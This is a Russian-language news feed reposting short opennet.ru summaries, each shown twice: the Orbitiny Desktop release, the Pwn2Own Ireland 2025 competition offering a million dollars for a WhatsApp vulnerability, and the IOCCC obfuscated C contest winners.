# Четвёртый экспериментальный выпуск среды рабочего стола Orbitiny
robot (spnet, 1) → All – 05:44:02 2025-08-04
Опубликован четвёртый выпуск среды рабочего стола Orbitiny Desktop, написанной с нуля с использованием фреймворка Qt. Проект пытается совместить некоторые инновационные идеи, которые раньше не встречались в пользовательских окружениях, с традиционными элементами, такими как панель, меню и размещение пиктограмм на рабочем столе. Код написан на языке C++ и распространяется под лицензией GPL.
https://www.opennet.ru/opennews/art.shtml?num=63674
robot (spnet, 1) → All – 05:44:02 2025-08-04
Опубликован четвёртый выпуск среды рабочего стола Orbitiny Desktop, написанной с нуля с использованием фреймворка Qt. Проект пытается совместить некоторые инновационные идеи, которые раньше не встречались в пользовательских окружениях, с традиционными элементами, такими как панель, меню и размещение пиктограмм на рабочем столе. Код написан на языке C++ и распространяется под лицензией GPL.
https://www.opennet.ru/opennews/art.shtml?num=63674
# На соревновании Pwn2Own готовы выплатить миллион долларов за уязвимость в WhatsApp
robot (spnet, 1) → All – 05:44:02 2025-08-04
Проект Zero Day Initiative (ZDI), предоставляющий денежные вознаграждения за сообщения о неисправленных уязвимостях, анонсировал проведение соревнований Pwn2Own Ireland 2025, которые состоятся в середине октября в Ирландии. Участникам предложено продемонстрирвоать эксплоиты для ранее неизвестных уязвимостей (0-day) в смартфонах, мессенджерах, беспроводных точках доступа, устройствах для умного дома, принтерах, сетевых хранилищах, системах видеонаблюдения и устройствах виртуальной /дополненной реальности. Атака должна быть проведена на самые свежие программы и операционные системы со всеми доступными обновлениями и в конфигурации по умолчанию.
https://www.opennet.ru/opennews/art.shtml?num=63673
robot (spnet, 1) → All – 05:44:02 2025-08-04
Проект Zero Day Initiative (ZDI), предоставляющий денежные вознаграждения за сообщения о неисправленных уязвимостях, анонсировал проведение соревнований Pwn2Own Ireland 2025, которые состоятся в середине октября в Ирландии. Участникам предложено продемонстрирвоать эксплоиты для ранее неизвестных уязвимостей (0-day) в смартфонах, мессенджерах, беспроводных точках доступа, устройствах для умного дома, принтерах, сетевых хранилищах, системах видеонаблюдения и устройствах виртуальной /дополненной реальности. Атака должна быть проведена на самые свежие программы и операционные системы со всеми доступными обновлениями и в конфигурации по умолчанию.
https://www.opennet.ru/opennews/art.shtml?num=63673
# Объявлены победители 28 конкурса по написанию запутанного кода на языке Си
robot (spnet, 1) → All – 20:44:02 2025-08-03
Опубликованы исходные тексты работ, победивших в двадцать восьмом конкурсе IOCCC (International Obfuscated C Code Contest), участникам которого предлагалось подготовить наиболее запутанный и трудноразбираемый код на языке Си. 28 конкурс проведён после четырёхлетнего перерыва и примечателен разрешением использовать кодировку UTF-8 в коде.
https://www.opennet.ru/opennews/art.shtml?num=63668
robot (spnet, 1) → All – 20:44:02 2025-08-03
Опубликованы исходные тексты работ, победивших в двадцать восьмом конкурсе IOCCC (International Obfuscated C Code Contest), участникам которого предлагалось подготовить наиболее запутанный и трудноразбираемый код на языке Си. 28 конкурс проведён после четырёхлетнего перерыва и примечателен разрешением использовать кодировку UTF-8 в коде.
https://www.opennet.ru/opennews/art.shtml?num=63668